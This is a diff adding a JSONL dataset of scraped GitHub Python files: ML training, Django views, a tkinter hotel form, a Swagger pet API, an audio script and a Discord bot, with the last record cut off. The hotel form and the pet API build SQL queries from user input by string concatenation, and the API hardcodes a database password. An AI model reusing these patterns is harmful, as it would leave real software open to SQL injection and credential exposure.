diff --git "a/1109.jsonl" "b/1109.jsonl" new file mode 100644--- /dev/null +++ "b/1109.jsonl" @@ -0,0 +1,884 @@ +{"seq_id": "36367894857", "text": "from ultralytics import YOLO\n\nregions = ['33T', '52S', '53S', '54S', '54T']\n\ndef train_model(region):\n model = YOLO('yolov8s.pt', task='detect')\n model.to('cuda')\n results = model.train(\n data=region + '.yaml',\n degrees=180,\n scale=0.1,\n fliplr=0.0,\n imgsz=1312,\n epochs=100,\n batch=4,\n mosaic = 0.0,\n perspective = 0,\n resume=False,\n hsv_h=0.005,\n name=region + '_s')\n return results\n\ndef train_models(regions):\n for region in regions:\n train_model(region)\n return \n\ndef main():\n train_models(regions)\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "kyledmccleary/vlr-project", "sub_path": "code/helpers/yolotrain_multi.py", "file_name": "yolotrain_multi.py", "file_ext": "py", "file_size_in_byte": 655, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "ultralytics.YOLO", "line_number": 6, "usage_type": "call"}]} +{"seq_id": "22721468301", "text": "from keras.models import load_model\nimport numpy as np\nimport skimage\nimport pydicom\nimport os\n\n\nclass CustomError(Exception):\n pass\n\n\nclass AxialClassifier:\n\n def __init__(self, in_dir, out_dir = False):\n self.files_in_dir = in_dir\n self.files_out_dir = out_dir\n self.files_out_new_dirs = []\n self.file_list = [x for x in os.listdir(in_dir) if x.endswith(\".dcm\")]\n self.x = []\n self.model = None\n self.classified_list = []\n\n def import_model(self, model_path):\n self.model = load_model(model_path)\n\n def img_to_array_list(self):\n for filename in self.file_list:\n img = pydicom.dcmread(os.path.join(self.files_in_dir, filename)).pixel_array[:, :, 0]\n im_rez = skimage.transform.resize(img, (256, 256, 1))\n self.x.append(im_rez)\n if len(self.x) > 0:\n self.x = np.array(self.x)\n else:\n raise CustomError(f\"No Dicom files in directory: {self.files_in_dir}\")\n\n def classify_axis(self):\n prediction = self.model.predict(self.x)\n view_list = []\n confidence_list = []\n for i in prediction:\n if i[0] >= 0.5:\n view_list.append(1)\n else:\n view_list.append(0)\n confidence_list.append(round(float(i[0]), 2))\n\n self.classified_list = list(zip(self.file_list, view_list, confidence_list))\n return self.classified_list\n\n def move_files_to_new_folders(self):\n if not self.files_out_dir:\n self.files_out_dir = self.files_in_dir\n\n new_folder_appendices = [\"/sagittal\", \"/non_sagittal\"]\n self.files_out_new_dirs = [os.path.join(self.files_out_dir + x) for x in new_folder_appendices]\n\n for nd in self.files_out_new_dirs:\n new_folder = os.path.join(self.files_out_dir, nd)\n if not os.path.exists(new_folder):\n os.makedirs(new_folder)\n\n for item in self.classified_list:\n if item[1] == 1:\n os.rename(os.path.join(self.files_in_dir, item[0]),\n os.path.join(self.files_out_new_dirs[0], item[0]))\n else:\n os.rename(os.path.join(self.files_in_dir, item[0]),\n os.path.join(self.files_out_new_dirs[1], item[0]))\n\n\nif __name__ == \"__main__\":\n classifier = AxialClassifier(\"C:/Users/julix/Documents/temp/chierici eco/dcm/WV_PROVA_3_anonymized\")\n classifier.import_model(\"NN_model/model_even_better.h5\")\n classifier.img_to_array_list()\n print(classifier.classify_axis())\n classifier.move_files_to_new_folders()\n", "repo_name": "webvalley/wv-mongo-docker", "sub_path": "plic_pipeline_gui/plic_pipeline_gui/image_axial_classification.py", "file_name": "image_axial_classification.py", "file_ext": "py", "file_size_in_byte": 2636, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.listdir", "line_number": 18, "usage_type": "call"}, {"api_name": "keras.models.load_model", "line_number": 24, "usage_type": "call"}, {"api_name": "pydicom.dcmread", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "skimage.transform.resize", "line_number": 29, "usage_type": "call"}, {"api_name": "skimage.transform", "line_number": 29, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path", "line_number": 55, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path", "line_number": 58, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path", "line_number": 59, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 60, "usage_type": "call"}, {"api_name": "os.rename", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path", "line_number": 64, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path", "line_number": 65, "usage_type": "attribute"}, {"api_name": "os.rename", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path", "line_number": 67, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 68, "usage_type": "call"}, {"api_name": "os.path", "line_number": 68, "usage_type": "attribute"}]} +{"seq_id": "69817227370", "text": "from django.shortcuts import render\nfrom django.http import HttpResponse, HttpResponseNotFound\nfrom django.shortcuts import redirect\nfrom django.urls import reverse\nfrom django.template import loader\nfrom app.models import job_post\n\n\njob_title=[\n 'Job 01',\n 'job 02',\n 'Job 03'\n]\njob_discription=[\n 'This is the job discription for Job 01',\n 'This is the job discription for Job 02',\n 'This is the job discription for Job 03'\n]\nclass TempValue:\n value=50\n num=12\n \n# def hello(request):\n# template=loader.get_template('app/hello.html')\n# list=['first_item', 'second_item']\n# temp=TempValue()\n# context={'name': 'Django', 'list_item': list, 'temp_value': temp}\n# return HttpResponse(template.render(context, request))\n\ndef hello(request):\n # template=loader.get_template('app/hello.html')\n list=['first_item', 'second_item']\n temp=TempValue()\n isAuth=False\n context={'name': 'Django', 'list_item': list,'isAuth':isAuth , 'temp_value': temp}\n # return HttpResponse(template.render(context, request))\n return render(request, 'app/hello.html', context)\n\n\n\n\n# Create your views here.\ndef home_page(request):\n # output=''\n # for i in job_title:\n # job_id=job_title.index(i)\n # # url=f'job/{str(job_id)}'\n # url=(reverse('job_url', args=(job_id, )))\n # output+=(f'

{i}

{job_discription[job_id]}

')\n \n # return HttpResponse(f\"{output}\")\n # # return HttpResponse(\"

Hello World

\")\n jobs=job_post.objects.all()\n context={'jobs':jobs}\n return render(request, \"app/index.html\", context)\n \n\n# def jobPage(request, id):\n# # print(id)\n# # id=id+1\n# if id > 2:\n# return redirect(reverse('home_page'))\n# # print(type(id))\n# # a=('this is a job page ',id)\n# # link= 'https://www.google.com'\n\n\n# return_html=f'

{job_title[id-1]}

{job_discription[id-1]}

'\n# return HttpResponse(return_html)\n\ndef jobPage(request, id):\n jobs=job_post.objects.get(id=id )\n try:\n # return_html=f'

{job_title[id-1]}

{job_discription[id-1]}

'\n # return HttpResponse(return_html)\n\n #old method\n #context={\"job_title\":job_title[id],'job_description':job_discription[id]}\n #return render(request, 'app\\job_details.html', context)\n\n #fetching from DB\n context={\"jobs\":jobs}\n return render(request, 'app\\job_details.html', context)\n except:\n return HttpResponseNotFound(\"Not found\")\n\n \n", "repo_name": "Vaibhavkatre005/django", "sub_path": "app/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2589, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.shortcuts.render", "line_number": 37, "usage_type": "call"}, {"api_name": "app.models.job_post.objects.all", "line_number": 53, "usage_type": "call"}, {"api_name": "app.models.job_post.objects", "line_number": 53, "usage_type": "attribute"}, {"api_name": "app.models.job_post", "line_number": 53, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 55, "usage_type": "call"}, {"api_name": "app.models.job_post.objects.get", "line_number": 72, "usage_type": "call"}, {"api_name": "app.models.job_post.objects", "line_number": 72, "usage_type": "attribute"}, {"api_name": "app.models.job_post", "line_number": 72, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 83, "usage_type": "call"}, {"api_name": "django.http.HttpResponseNotFound", "line_number": 85, "usage_type": "call"}]} +{"seq_id": "15428907896", "text": "from tkinter import *\nfrom PIL import ImageTk,Image\nfrom tkinter import messagebox\nimport sqlite3\n\n#Connection to database\n#ENTER YOUR USER NAME AND PASSWORD TO CONNECT TO DATABASE\n\n\n#table connection\n\n\ndef addcustomer1():\n Lname = custInfo1.get()\n Rnb = custInfo2.get()\n Date=custInfo3.get()\n Nbr = custInfo4.get()\n P = custInfo5.get()\n \n \n insertRes = \"insert into checkin values('\"+Lname+\"','\"+Rnb+\"','\"+Date+\"','\"+Nbr+\",'\"+P+\"'')\"\n try:\n cur.execute(insertRes)\n con.commit()\n messagebox.showinfo('Success',\"Booked successfully\")\n except:\n messagebox.showinfo(\"Error\",\"Already booked\")\n \n print(Lname)\n print(Rnb)\n print(Date)\n print(Nbr)\n print(P)\n\n\n\ndef add_customer_details1():\n global custInfo1, custInfo2, custInfo3, custInfo4, custInfo5, Canvas1, con, cur, cust,root3\n\nroot3= Tk()\nroot3.title(\"Add Customer details\")\nroot3.minsize(width=400,height=400)\n#root3.iconbitmap(\"icons8_five_of_five_stars.ico\")\nroot3.geometry(\"600x500\")\n# root3.iconbitmap(\"icons8_hotel.ico\")\n\ncon = sqlite3.connect(\"Hotel__man.db\")\ncur = con.cursor()\n\nCanvas1 = Canvas(root3)\nCanvas1.config(bg=\"#E5D4B3\")\nCanvas1.pack(expand=True,fill=BOTH)\n\n\nheadingFrame1 = Frame(root3,bg=\"#DDC1A2\",bd=5)\nheadingFrame1.place(relx=0.25,rely=0.1,relwidth=0.5,relheight=0.13)\n\nheadingLabel = Label(headingFrame1, text=\"Add reservation\", bg='black', fg='white', font=('Courier',15))\nheadingLabel.place(relx=0,rely=0, relwidth=1, relheight=1)\n\n\nlabelFrame = Frame(root3,bg='black')\nlabelFrame.place(relx=0.1,rely=0.4,relwidth=0.8,relheight=0.4)\n\n#Last Name\nlb1 = Label(labelFrame,text=\"Full Name:\",bg='black',fg='white')\nlb1.place(relx=0.05,rely=0.2, relheight=0.08)\n\ncustInfo1 = Entry(labelFrame)\ncustInfo1.place(relx=0.3,rely=0.2, relwidth=0.62, relheight=0.08)\n\n\n#Room number\nlb2 = Label(labelFrame,text=\"Room number : \", bg='black', fg='white')\nlb2.place(relx=0.05,rely=0.35, relheight=0.08)\n \ncustInfo2 = Entry(labelFrame)\ncustInfo2.place(relx=0.3,rely=0.35, relwidth=0.62, relheight=0.08)\n\n#Issue Date\nlb3 = Label(labelFrame,text=\"Issue Date : \", bg='black', fg='white')\nlb3.place(relx=0.05,rely=0.50, relheight=0.08)\n \ncustInfo3 = Entry(labelFrame)\ncustInfo3.place(relx=0.3,rely=0.50, relwidth=0.62, relheight=0.08)\n\n#Number of days\nlb4 = Label(labelFrame,text=\"Number of days : \", bg='black', fg='white')\nlb4.place(relx=0.05,rely=0.65, relheight=0.08)\n \ncustInfo4 = Entry(labelFrame)\ncustInfo4.place(relx=0.3,rely=0.65, relwidth=0.62, relheight=0.08)\n\n\n#Payment method\nlb5 = Label(labelFrame,text=\"Cash/Credit card : \", bg='black', fg='white')\nlb5.place(relx=0.05,rely=0.80, relheight=0.08)\n \ncustInfo5 = Entry(labelFrame)\ncustInfo5.place(relx=0.3,rely=0.80, relwidth=0.62, relheight=0.08)\n\n\n\n#Submit Button\nSubmitBtn = Button(root3,text=\"Add Reservation\",bg='#47290F', fg='white',command=addcustomer1)\nSubmitBtn.place(relx=0.28,rely=0.9, relwidth=0.18,relheight=0.08)\n\nquitBtn = Button(root3,text=\"Quit\",bg='#47290F', fg='white', command=root3.destroy)\nquitBtn.place(relx=0.53,rely=0.9, relwidth=0.18,relheight=0.08)\n\nroot3.mainloop()\n", "repo_name": "SoukainaOujaa/Hotel_Management_System_Python", "sub_path": "adduser1.py", "file_name": "adduser1.py", "file_ext": "py", "file_size_in_byte": 3105, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "tkinter.messagebox.showinfo", "line_number": 25, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 25, "usage_type": "name"}, {"api_name": "tkinter.messagebox.showinfo", "line_number": 27, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 27, "usage_type": "name"}, {"api_name": "sqlite3.connect", "line_number": 47, "usage_type": "call"}]} +{"seq_id": "1941086451", "text": "import gzip\nimport os\nimport pickle\nimport sys\nfrom collections import defaultdict\n\nimport fasttext\n\nurl_info_dict = defaultdict(dict)\nnum_url_lines = 0\nprint(\"reading url info dict\")\nfor line in open(os.path.abspath(sys.argv[1])):\n try:\n word, correspond_file_path, page_url, image_link = line.strip().split()\n url_info_dict[page_url][correspond_file_path] = word\n num_url_lines += 1\n except:\n pass\nprint(\"length of url info dict\", len(url_info_dict), num_url_lines)\n\npickle_folder = os.path.abspath(sys.argv[2])\ntarget_lang = sys.argv[5]\nfasttext_path = os.path.abspath(sys.argv[6])\nfasttext_model = fasttext.load_model(fasttext_path)\nfasttext_lang = \"__label__\" + target_lang\n\nwrite_count = 0\nwith gzip.open(os.path.abspath(sys.argv[3]), \"wt\") as writer, gzip.open(os.path.abspath(sys.argv[4]),\n \"wt\") as short_writer:\n for f in os.listdir(pickle_folder):\n if not f.endswith(\".pickle.gz\"):\n continue\n print(f, write_count)\n current_output = []\n current_short_output = []\n with gzip.open(os.path.join(pickle_folder, f), \"rb\") as fin:\n cur_dict = pickle.load(fin)\n for target_url in cur_dict.keys():\n try:\n body_list = [sentence for sentence in cur_dict[target_url][\"body\"].values() if \"::\" not in sentence]\n fasttext_pred = fasttext_model.predict(body_list)\n body_list = [sentence for i, sentence in enumerate(body_list) if\n fasttext_pred[0][i][0] == fasttext_lang and fasttext_pred[1][i][0] > 0.95]\n\n if len(body_list) == 0:\n continue\n\n body_text = \"\\t\".join(body_list)\n\n for file_path, word in url_info_dict[target_url].items():\n if target_url in url_info_dict and word.lower() in body_text.lower():\n whole_text = word + \"\\t\" + file_path + \"\\t\" + body_text\n # Doing this to make sure that the text is ok\n t = whole_text.encode(\"utf-8\")\n\n short_body = [body for body in body_list if word.lower() in body.lower()]\n short_text = \"\\t\".join([word, file_path] + short_body)\n current_output.append(whole_text)\n current_short_output.append(short_text)\n write_count += 1\n except:\n pass\n writer.write(\"\\n\".join(current_output))\n writer.write(\"\\n\")\n short_writer.write(\"\\n\".join(current_short_output))\n short_writer.write(\"\\n\")\n\nprint(\"finished\", write_count)\n", "repo_name": "rasoolims/mmid_explore", "sub_path": "collect_passage_for_target_urls.py", "file_name": "collect_passage_for_target_urls.py", "file_ext": "py", "file_size_in_byte": 2814, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.defaultdict", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 21, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 23, "usage_type": "attribute"}, {"api_name": "fasttext.load_model", "line_number": 24, "usage_type": "call"}, {"api_name": "gzip.open", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 30, "usage_type": "call"}, {"api_name": "gzip.open", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "pickle.load", "line_number": 37, "usage_type": "call"}]} +{"seq_id": "12453716786", "text": "import matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.optimize import curve_fit\nimport os\n\nfile=\"moments.dat\";\nmydata = np.loadtxt(file,skiprows=1,unpack=True)\n\ny=mydata[0]\nkappa1_avg=mydata[1]\nk1error=mydata[2]\nkappa2_avg=mydata[3]\nk2error=mydata[4]\nkappa3_avg=mydata[5]\nk3error=mydata[6]\nkappa4_avg=mydata[7]\nk4error=mydata[8]\nomega=mydata[9]\nwerror=mydata[10]\nSsigma=mydata[11]\nSerror=mydata[12]\nKsigma2=mydata[13]\nKerror=mydata[14]\nc3c1=mydata[15]\nc3c1error=mydata[16]\nc4c3=mydata[17]\nc4c3error=mydata[18]\n\ndef parabola(y, a, b):\n return a*y**2 + b\ndef gaussian(y, A, sigma):\n return A*np.exp(-y**2/(2*sigma**2))/(np.sqrt(2*np.pi*abs(sigma)))\ndef quartic(y, A, B, C):\n return A*y**4+B*y**2+C\ndef hexic(y, A, B, C, D):\n return A*y**6+B*y**4+C*y**2+D\n\nfig=plt.figure(figsize=(8,12))\nax1 = fig.add_subplot(211)\nplt.ylabel('$C_3/C_1$', fontsize=22, weight='normal')\nax2 = fig.add_subplot(212)\nplt.ylabel('$C_4/C_3$', fontsize=22, weight='normal')\n\n\nparam, param_cov = curve_fit(parabola, y, c3c1)\nparab = param[0]*(y)**2+param[1]\nparam, param_cov = curve_fit(quartic, y, c3c1)\nquart = param[0]*y**4+param[1]*y**2+param[2]\n#param, param_cov = curve_fit(hexic, y, c3c1)\n#hex = param[0]*y**6+param[1]*y**4+param[2]*y**2+param[3]\nax1.errorbar(y,c3c1,c3c1error,linestyle='',linewidth=2,markersize=8,color='b', marker='d', markerfacecolor=None, markeredgecolor=None)\nax1.plot(y,parab,linestyle='-',color='b')\nax1.plot(y,quart,linestyle=':',color='b')\n#ax1.plot(y,hex,linestyle='--',color='b')\n\nparam, param_cov = curve_fit(parabola, y, c4c3)\nparab = (param[0]*(y)**2+param[1])\nparam, param_cov = curve_fit(quartic, y, c4c3)\nquart = param[0]*y**4+param[1]*y**2+param[2]\nax2.errorbar(y,c4c3,c4c3error,linestyle='',linewidth=2,markersize=8,color='k', marker='^', markerfacecolor=None, markeredgecolor=None)\nax2.plot(y,parab,linestyle='-',color='k')\nax2.plot(y,quart,linestyle=':',color='k')\nplt.xlabel('y',fontsize=18 , weight='normal')\n\nplt.savefig('figs/altratios.pdf',format='pdf')\nos.system('xdg-open figs/altratios.pdf')\nquit()\n", "repo_name": "scottedwardpratt/fluxtubes", "sub_path": "rachelrun/altratios.py", "file_name": "altratios.py", "file_ext": "py", "file_size_in_byte": 2044, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.loadtxt", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 32, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 45, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 47, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 56, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 63, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 65, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 65, "usage_type": "name"}, {"api_name": "os.system", "line_number": 66, "usage_type": "call"}]} +{"seq_id": "6743177715", "text": "import connexion\nimport six\nimport mysql.connector\n\nfrom swagger_server.models.error import Error # noqa: E501\nfrom swagger_server.models.pets import Pets # noqa: E501\nfrom swagger_server import util\nimport json\n\n\n\ndef _convert_to_json(description, query_results):\n headers=[x[0] for x in description]\n\n json_data=[]\n\n for result in query_results:\n json_data.append(dict(zip(headers, result)))\n\n return json_data\n\n\n\ndef create_pets(): # noqa: E501\n \"\"\"Create a pet\n\n # noqa: E501\n\n\n :rtype: None\n \"\"\"\n return 'do some magic!'\n\n\ndef list_pets(limit=None): # noqa: E501\n mydb = mysql.connector.connect(\n host=\"localhost\",\n user=\"swagger_user\",\n password=\"haslo123\",\n database=\"swagger\"\n )\n mycursor = mydb.cursor()\n\n mycursor.execute(\"SELECT * FROM pets\")\n\n result = json.dumps(_convert_to_json(\n mycursor.description, mycursor.fetchall()))\n\n print(result)\n\n return json.loads(result)\n\n\ndef show_pet_by_id(petId): # noqa: E501\n mydb = mysql.connector.connect(\n host=\"localhost\",\n user=\"swagger_user\",\n password=\"haslo123\",\n database=\"swagger\"\n )\n mycursor = mydb.cursor()\n\n mycursor.execute(f\"SELECT * FROM pets WHERE id ={petId}\")\n\n result = json.dumps(_convert_to_json(\n mycursor.description, mycursor.fetchall()))\n\n print(type(result[0]), result[0])\n\n return json.loads(result)[0]\n", "repo_name": "Kadziok/Swagger_test", "sub_path": "swagger_server/controllers/pets_controller.py", "file_name": "pets_controller.py", "file_ext": "py", "file_size_in_byte": 1434, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "mysql.connector.connector.connect", "line_number": 36, "usage_type": "call"}, {"api_name": "mysql.connector.connector", "line_number": 36, "usage_type": "attribute"}, {"api_name": "mysql.connector", "line_number": 36, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 46, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 51, "usage_type": "call"}, {"api_name": "mysql.connector.connector.connect", "line_number": 55, "usage_type": "call"}, {"api_name": "mysql.connector.connector", "line_number": 55, "usage_type": "attribute"}, {"api_name": "mysql.connector", "line_number": 55, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 65, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 70, "usage_type": "call"}]} +{"seq_id": "30065332395", "text": "import sys, os\nsys.path.append(os.path.dirname(os.path.dirname(os.getcwd() + '/' + __file__)))\nfrom tsmnet import Stretcher\nimport torch, torchaudio\nfrom pathlib import Path\nimport numpy as np\nimport librosa\nimport sox\nimport argparse\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('audio_list', help='A file containing audio filenames. One song each line.', type=Path)\n parser.add_argument('weight_dir', help='e.g. ../scripts/logs-fma/weights', type=Path)\n parser.add_argument('CR', help='Compression ratio. e.g. 1024. Can also be `librosa` or `sox`', type=str)\n parser.add_argument('-o', '--out_dir', default='samples', help='output directory', type=Path)\n \n args = parser.parse_args()\n return args\n\ndef files_to_list(filename):\n \"\"\"\n Takes a text file of filenames and makes a list of filenames\n \"\"\"\n with open(filename, encoding=\"utf-8\") as f:\n files = f.readlines()\n\n files = [Path(f.rstrip()) for f in files]\n return files\n\ndef main():\n args = parse_args()\n # initialize different stretchers\n if str(args.weight_dir) == 'sox':\n tfm = sox.transform.Transformer()\n elif str(args.weight_dir) != 'librosa':\n stretcher = Stretcher(args.weight_dir)\n \n files = files_to_list(args.audio_list)\n\n for file in files:\n (args.out_dir / file.stem / args.CR).mkdir(parents=True, exist_ok=True)\n x, sr = torchaudio.load(file)\n x = torchaudio.transforms.Resample(orig_freq=sr, new_freq=22050)(x)\n sr = 22050\n if str(args.weight_dir) == 'librosa' or str(args.weight_dir) == 'sox':\n x = x.numpy()\n\n for rate in ['0.5', '0.75', '1.0', '1.25', '1.5', '1.75', '2.0']:\n if str(args.weight_dir) == 'librosa':\n if len(x.shape) == 1:\n x_scaled = librosa.effects.time_stretch(x, float(rate))\n else:\n x_scaled = [ librosa.effects.time_stretch(x[0], float(rate)) ]\n for i in range(1, len(x.shape)):\n x_scaled.append(librosa.effects.time_stretch(x[i], float(rate)))\n x_scaled = np.array(x_scaled)\n elif str(args.weight_dir) == 'sox':\n tfm.tempo(float(rate))\n if len(x.shape) == 1:\n x_scaled = tfm.build_array(input_array=x, sample_rate_in=sr)\n else:\n x_scaled = [ tfm.build_array(input_array=x[0], sample_rate_in=sr) ]\n for i in range(1, len(x.shape)):\n x_scaled.append(tfm.build_array(input_array=x[i], sample_rate_in=sr))\n x_scaled = np.array(x_scaled)\n else:\n x_scaled = stretcher(x, float(rate))\n fname = str(args.out_dir / file.stem / args.CR / (rate + '.mp3'))\n print(f'writing {fname}')\n torchaudio.save(fname, torch.from_numpy(x_scaled), sr)\n \nif __name__ == \"__main__\":\n main()", "repo_name": "ernestchu/tsm-net", "sub_path": "scripts/generate-samples.py", "file_name": "generate-samples.py", "file_ext": "py", "file_size_in_byte": 3000, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.path.append", "line_number": 2, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 2, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 2, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 2, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 12, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 13, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 14, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 16, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 28, "usage_type": "call"}, {"api_name": "sox.transform.Transformer", "line_number": 35, "usage_type": "call"}, {"api_name": "sox.transform", "line_number": 35, "usage_type": "attribute"}, {"api_name": "tsmnet.Stretcher", "line_number": 37, "usage_type": "call"}, {"api_name": "torchaudio.load", "line_number": 43, "usage_type": "call"}, {"api_name": "torchaudio.transforms.Resample", "line_number": 44, "usage_type": "call"}, {"api_name": "torchaudio.transforms", "line_number": 44, "usage_type": "attribute"}, {"api_name": "librosa.effects.time_stretch", "line_number": 52, "usage_type": "call"}, {"api_name": "librosa.effects", "line_number": 52, "usage_type": "attribute"}, {"api_name": "librosa.effects.time_stretch", "line_number": 54, "usage_type": "call"}, {"api_name": "librosa.effects", "line_number": 54, "usage_type": "attribute"}, {"api_name": "librosa.effects.time_stretch", "line_number": 56, "usage_type": "call"}, {"api_name": "librosa.effects", "line_number": 56, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 66, "usage_type": "call"}, {"api_name": "torchaudio.save", "line_number": 71, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "5461820321", "text": "import datetime\nimport os\nfrom pathlib import Path\nimport discord\nfrom discord.ext import commands\nfrom dotenv import load_dotenv\nfrom datetime import datetime\n\nload_dotenv(\"Bot.env\")\n\nbot = commands.Bot(command_prefix=commands.when_mentioned_or(\"$\"), intents=discord.Intents.all(),\n case_insensitive=True, description=\"Bot description\", help_command=None, auto_sync_commands=True\n )\n\nnow = datetime.now()\ndt_string = now.strftime(\"%d/%m/%Y %H:%M:%S\")\n\n\n@bot.event\nasync def on_ready():\n print('---------------------------')\n print(dt_string)\n print('Logged in as:')\n print(bot.user.name)\n print(bot.user.id)\n print('---------------------------')\n await bot.change_presence(activity=discord.Activity(type=discord.ActivityType.watching, name=\"Game-Energy Discord\"),\n status=discord.Status.idle)\n\n\ndef extensions():\n files = Path(\"cogs\").rglob(\"*.py\")\n for file in files:\n yield file.as_posix()[:-3].replace(\"/\", \".\")\n\n\ndef load():\n for ext_file in extensions():\n try:\n bot.load_extension(ext_file)\n print(f\"Loaded {ext_file}\")\n except Exception as ex:\n print(f\"Failed to load {ext_file}: {ex}\")\n\n\ndef unload():\n for ext_file in extensions():\n try:\n bot.unload_extension(ext_file)\n print(f\"Unloaded {ext_file}\")\n except Exception as ex:\n print(f\"Failed to unload {ext_file}: {ex}\")\n\n\nasync def client_reload():\n unload()\n load()\n print(\"\")\n print(f\"Reloaded at {dt_string}\")\n print(\"\")\n\n@bot.command()\nasync def reload(ctx):\n await client_reload()\n embed = discord.Embed(title=\"Reload abgeschlossen!\", colour=discord.Colour.red(),\n description=\"Alle Module des Discord Bots wurden erfolgreich neu geladen\")\n embed.set_footer(text=f\"Reload wurde von {ctx.author} ausgelöst\",\n icon_url=\"https://cdn.max1021.de/G-E/GameEnergy_Green.png\")\n await ctx.send(embed=embed)\n\n\n@bot.event\nasync def on_command_error(ctx: commands.Context, error):\n if ctx.invoked_with in [\"rename\", \"close\"]:\n return\n embed = discord.Embed(title=\"Es ist ein Fehler aufgetreten\", colour=discord.Colour.red(),\n description=f\"Bei der Ausführung des Commands ist ein Fehler aufgetreten.\\n \"\n f\"**Error:** {error}\")\n await ctx.send(embed=embed)\n\n\nif __name__ == \"__main__\":\n load()\n bot.run(f\"{os.getenv('TOKEN')}\")\n", "repo_name": 